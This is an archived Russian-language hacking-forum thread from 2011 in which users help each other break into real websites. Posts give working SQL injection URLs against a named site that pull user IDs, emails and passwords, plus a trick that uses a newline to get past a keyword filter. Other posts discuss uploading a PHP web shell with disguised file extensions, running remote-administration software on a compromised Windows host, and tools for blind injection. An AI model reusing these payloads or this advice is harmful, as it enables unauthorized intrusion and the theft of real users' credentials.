ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.01.2011, 18:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
122440
Репутация:
-4
|
|
privateurl.com
в поле логин
хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите
кста через union можно ток select выполнять или апдэйт, delete, insert тож
|
|
|
|
28.01.2011, 01:12
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Так работает:
Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\ |
|
|
28.01.2011, 01:50
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994
Репутация:
104
|
|
Сообщение от DCrypt
DCrypt said:
Так работает:
Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\ Кажется там from фильтруется.
|
|
|
|
28.01.2011, 02:27
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Сообщение от None
Кажется там from фильтруется.
http://www.exploit-db.com/exploits/16060/
Где?
|
|
|
|
28.01.2011, 14:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от DCrypt
DCrypt said:
http://www.exploit-db.com/exploits/16060/
Где?
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:
Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
|
|
|
|
28.01.2011, 15:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
|
|
|
|
28.01.2011, 15:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
20602
Репутация:
0
|
|
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
|
|
|
|
28.01.2011, 23:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
23579
Репутация:
-5
|
|
uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586
Safe-mode: ON (secure)
C:\ drwxrwxrwx
(это пхп шелл)
Можно как-то запускать радмин или что-то?
|
|
|
|
29.01.2011, 01:07
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Сообщение от KandidaT'S
KandidaT'S said:
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
Нереал так подсказать.
В админке есть залив файлов?
Сообщение от noviyuser
noviyuser said:
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
Тулза от Пашкелы вроде умеет.
|
|
|
|
29.01.2011, 08:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
20602
Репутация:
0
|
|
заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
